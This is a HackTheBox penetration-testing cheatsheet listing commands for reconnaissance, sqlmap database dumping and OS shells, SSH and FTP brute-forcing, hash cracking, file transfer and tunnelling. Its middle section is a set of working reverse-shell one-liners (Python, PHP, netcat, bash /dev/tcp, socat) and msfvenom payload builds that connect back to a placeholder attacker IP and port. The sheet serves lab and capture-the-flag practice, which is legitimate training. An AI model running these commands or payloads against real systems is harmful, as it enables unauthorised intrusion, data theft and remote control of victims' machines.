HackTheBox Cheatsheet from any sources. Feel free to contribute.
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
Source: https://nmap.org/
nmap -sV -sC -o result.nmap <IP>
AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
Source: https://github.com/Tib3rius/AutoRecon
autorecon <IP> -o <output> # Save output to file
dig is a flexible tool for interrogating DNS name servers.
Source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
# Zone Transfer
dig axfr @<IP>
dig axfr @<IP> <DOMAIN>
# More Info
dig ANY @<IP> <DOMAIN> # Any information
dig A @<IP> <DOMAIN> # Regular DNS request
dig AAAA @<IP> <DOMAIN> # IPv6 DNS request
dig TXT @<IP> <DOMAIN> # Information
dig MX @<IP> <DOMAIN> # Emails related
dig NS @<IP> <DOMAIN> # DNS that resolves that name
dig -x 192.168.0.2 @<IP> # Reverse lookup
dig -x 2a00:1450:400c:c06::93 @<IP> # Reverse IPv6 lookup
DNSRecon is a Python script that provides the ability to perform: Check all NS Records for Zone Transfers. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT).
Source: https://github.com/darkoperator/dnsrecon
dnsrecon -d <DOMAIN> -a -n <IP> # Zone Transfer
dnsrecon -D <WORDLIST> -d <DOMAIN> -n <IP> # Brute-force subdomains
A fast web fuzzer written in Go.
Source: https://github.com/ffuf/ffuf
ffuf -w <WORDLIST> -u http://<IP/DOMAIN>/FUZZ # Directory discovery
ffuf -w <WORDLIST> -u http://<IP/DOMAIN>/ -H 'Host: FUZZ' -fs 4242 # Vhost discovery (-fs is default vhost response size)
ffuf -w <WORDLIST> -u http://<IP/DOMAIN>/index.php?FUZZ=1 -fs 4242 # GET parameter discovery
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses.
Source: http://dirb.sourceforge.net/
dirb http://<IP/DOMAIN>/ <WORDLIST>
Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains.
Source: https://github.com/OJ/gobuster
gobuster dir -u https://<IP/DOMAIN> -w <WORDLIST> # dir mode
gobuster dns -d <DOMAIN> -w <WORDLIST> # dns mode
gobuster vhost -u http://<DOMAIN> -w <WORDLIST> # vhost mode
An advanced command-line tool designed to brute force directories and files in webservers.
Source: https://github.com/maurosoria/dirsearch
./dirsearch.py -u http://<IP/DOMAIN> # default
./dirsearch.py -e php,html,js -u http://<IP/DOMAIN> # custom extension
./dirsearch.py -e php,html,js -u http://<IP/DOMAIN> -w <WORDLIST> # custom wordlist & extension
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Source: https://sqlmap.org/
sqlmap -u <URL> --dbs # get a list of databases
sqlmap -u <URL> -D <DATABASE> --tables # get a list of tables on database
sqlmap -u <URL> -D <DATABASE> -T <TABLE> --columns # get a list of columns on table
sqlmap -u <URL> -D <DATABASE> -T <TABLE> -C <column,column> --dump # get contents of specified columns
sqlmap -u <URL> --os-shell # get shell to run command on target
sqlmap -u <URL> --file=<FILE> # read file on target
sqlmap -u <URL> --file-write=<LOCALFILE> --file-dest=<REMOTEPATH> # write file on target
sqlmap -u <URL> --sql-query=<SQLQUERY> # execute sql query
WPScan scans remote WordPress installations to find security issues.
Source: https://github.com/wpscanteam/wpscan
wpscan --url http://<IP/DOMAIN>/ # default scan (more info: wpscan -h/-hh)
Nikto is a pluggable web server and CGI scanner written in Perl, using rfp’s LibWhisker to perform fast security or informational checks.
Source: https://github.com/sullo/nikto
nikto -host http://<IP/DOMAIN>/
The Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more. Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.
Source: https://www.offensive-security.com/metasploit-unleashed/auxiliary-module-reference/
# Example Usage
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > set RHOSTS <IP/IPs>
RHOSTS => <IP/IPs>
msf auxiliary(smb_version) > run
A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
Source: https://github.com/CiscoCXSecurity/enum4linux
enum4linux <IP/DOMAIN>
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.
Source: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
remote:~$ ./linpeas.sh
Check the Local Windows Privilege Escalation.
Source: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
C:\Windows\Temp> .\winpeas.exe
pspy is a command line tool designed to snoop on processes without need for root permissions.
Source: https://github.com/DominicBreuker/pspy
remote:~$ ./pspy64
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
Source: https://www.openwall.com/john/
john --wordlist=<WORDLIST> <FILE> # default
john --format=<HASHFORMAT> --wordlist=<WORDLIST> <FILE> # define hash type
john --show <FILE> # show cracked hash
Hashcat supports five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, and has facilities to help enable distributed password cracking.
Source: https://hashcat.net/hashcat/
hashcat <FILE> <WORDLIST>
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.
Source: https://github.com/vanhauser-thc/thc-hydra
hydra -L <USERLIST> -P <PASSLIST> ssh://<IP/DOMAIN> # brute-force ssh
hydra -l <USER> -P <PASSLIST> ssh://<IP/DOMAIN> # brute-force ssh known username
# more information hydra -h
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Source: https://github.com/lanjelot/patator
patator ftp_login user=<USER> password=FILE0 0=<WORDLIST> host=<IP/DOMAIN> -x ignore:mesg='Login incorrect.' # brute-force ftp
patator mysql_login user=<USER> password=FILE0 0=<WORDLIST> host=<IP/DOMAIN> -x ignore:fgrep='Access denied for user' # brute-force mysql
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p=subprocess.call(["/bin/sh","-i"]) # you can change to /bin/bashFull Code: https://github.com/pentestmonkey/php-reverse-shell
php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'nc -e /bin/sh <IP> <PORT> # if option -e availablerm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f # if option -e not availablebash -i >& /dev/tcp/<IP>/<PORT> 0>&1 # tcp mode
bash -i >& /dev/udp/<IP>/<PORT> 0>&1 # udp modeAttacker:
socat file:`tty`,raw,echo=0 tcp-listen:<PORT>Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>Source: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
Non-Meterpreter:
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe # staged windows x86
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe # staged windows x64
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe # stageless windows x86
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe # stageless windows x64
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf # staged linux x86
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # staged linux x64
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf # stageless windows x86
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # stageless windows x64Meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe # staged windows x86
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe # staged windows x64
msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe # stageless windows x86
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe # stageless windows x64
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf # staged linux x86
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # staged linux x64
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf # stageless linux x86
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # stageless linux x64GNU Wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies.
Source: https://www.gnu.org/software/wget/
wget http://[IP]/file
wget --no-check-certificate http://[IP]/filecurl is a tool to transfer data from or to a server, using one of the supported protocols (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET and TFTP).
Source: https://curl.se/
curl http://[IP]/file # print output to stdout
curl http://[IP]/file -o [FILE] # save output to fileNetcat usually used for reverse shell, but you can also use it for transfer files.
receiver:~$ nc -nvlp [PORT] > filename
sender:~$ cat file | nc -w 2 [IP_RECEIVER] [PORT]Openssl can be used for transfer file.
Source: https://www.openssl.org/
More info: https://gtfobins.github.io/gtfobins/openssl/
Receiver:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port [PORT] > filename
Sender:
openssl s_client -quiet -connect <RECEIVER_IP>:<PORT> < "<FILE>"
Source: https://docs.microsoft.com/en-us/powershell/
WebClient:
(New-Object System.Net.WebClient).DownloadFile("<URL>", "<PATHTOFILE>")
Invoke-WebRequest
Invoke-WebRequest -Uri <URL> -OutFile <PATHTOFILE>
The purpose of the certutil was originally for certificate and CA management, but can also be used for file transfer.
Source: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
certutil -urlcache -f http://192.168.1.2/putty.exe putty.exe
SSH tunneling, or SSH port forwarding, is a method of transporting arbitrary data over an encrypted SSH connection. SSH tunnels allow connections made to a local port (that is, to a port on your own desktop) to be forwarded to a remote machine via a secure channel.
Source: https://www.concordia.ca/ginacody/aits/support/faq/ssh-tunnel.html
ssh -L <LPORT>:<RHOST>:<RPORT> <USER>@<IP>
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang).
Source: https://github.com/jpillora/chisel
local:~$ ./chisel server -p 4444 --reverse
machine:~$ ./chisel client <LHOST>:4444 R:<LPORT>:<RHOST>:<RPORT>
You can access machine : from :.
shootback is a reverse TCP tunnel let you access target behind NAT or firewall.
Source: https://github.com/aploium/shootback
local:~$ python3 master.py -m <LHOST>:4444 -c 127.0.0.1:<LPORT>
machine:~$ python3 slaver.py -m <LHOST>:4444 -t <RHOST>:<RPORT>
A simple security tunnel written in Golang.
Source: https://github.com/ginuerzh/gost/blob/master/README_en.md